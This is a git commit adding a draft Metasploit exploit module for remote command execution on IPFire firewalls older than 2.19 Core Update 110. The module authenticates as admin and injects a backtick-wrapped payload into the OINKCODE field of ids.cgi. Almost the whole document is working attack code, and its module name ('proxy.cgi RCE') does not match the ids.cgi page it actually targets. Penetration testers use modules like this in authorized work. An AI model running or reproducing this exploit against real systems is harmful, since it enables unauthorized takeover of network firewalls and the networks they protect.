first draft of oinkcode

2017-06-14 08:04:17 -04:00 · 2017-06-14 08:04:17 -04:00 · c35dffc648
parent e7fa4c2d06
commit c35dffc648
1 changed files with 111 additions and 0 deletions
--- a/modules/exploits/linux/http/ipfire_oinkcode_exec.rb
+++ b/modules/exploits/linux/http/ipfire_oinkcode_exec.rb
@ -0,0 +1,111 @@
+##
+## This module requires Metasploit: http://metasploit.com/download
+## Current source: https://github.com/rapid7/metasploit-framework
+###
+
+class MetasploitModule < Msf::Exploit::Remote
+  include Msf::Exploit::Remote::HttpClient
+
+  Rank = ExcellentRanking
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'        => 'IPFire proxy.cgi RCE',
+        'Description' => %q(
+          IPFire, a free linux based open source firewall distribution,
+          version < 2.19 Update Core 110 contains a remote command execution
+          vulnerability in the ids.cgi page in the OINKCODE field.
+        ),
+        'Author'      =>
+          [
+            'h00die <mike@stcyrsecurity.com>', # module
+            '0x09AL'                         # discovery
+          ],
+        'References'  =>
+          [
+            [ 'EDB', '42149' ]
+          ],
+        'License'        => MSF_LICENSE,
+        'Platform'       => 'unix',
+        'Privileged'     => false,
+        'DefaultOptions' => { 'SSL' => true },
+        'Arch'           => [ ARCH_CMD ],
+        'Payload'        =>
+          {
+            'Compat' =>
+              {
+                'PayloadType' => 'cmd',
+                'RequiredCmd' => 'perl awk openssl'
+              }
+          },
+        'Targets'        =>
+          [
+            [ 'Automatic Target', {}]
+          ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => 'Jun 09 2016'
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('USERNAME', [ true, 'User to login with', 'admin']),
+        OptString.new('PASSWORD', [ false, 'Password to login with', '']),
+        Opt::RPORT(444)
+      ], self.class
+    )
+  end
+
+  def check
+    begin
+      res = send_request_cgi(
+        'uri'       => '/cgi-bin/pakfire.cgi',
+        'method'    => 'GET'
+      )
+      fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
+      fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code != 200
+      /\<strong\>IPFire (?<version>[\d.]{4}) \([\w]+\) - Core Update (?<update>[\d]+)/ =~ res.body
+
+      if version && update && version == "2.19" && update.to_i <= 110
+        Exploit::CheckCode::Appears
+      else
+        Exploit::CheckCode::Safe
+      end
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+    end
+  end
+
+  def exploit
+    begin
+
+      res = send_request_cgi(
+        'uri'           => '/cgi-bin/ids.cgi',
+        'method'        => 'POST',
+        'ctype'         => 'application/x-www-form-urlencoded',
+        'headers'       =>
+          {
+            'Referer' => "https://#{datastore['RHOST']}:#{datastore['RPORT']}/cgi-bin/ids.cgi"
+          },
+        'data'          => {
+            'ENABLE_SNORT_GREEN' => 'on',
+            'ENABLE_SNORT' => 'on',
+            'RULES' => 'registered',
+            'OINKCODE' => "`#{payload.encoded}`",
+            'ACTION' => 'Download new ruleset',
+            'ACTION2' => 'snort'
+          },
+      )
+
+      # success means we hang our session, and wont get back a response
+      if res
+        fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
+        fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code != 200
+      end
+
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+    end
+  end
+end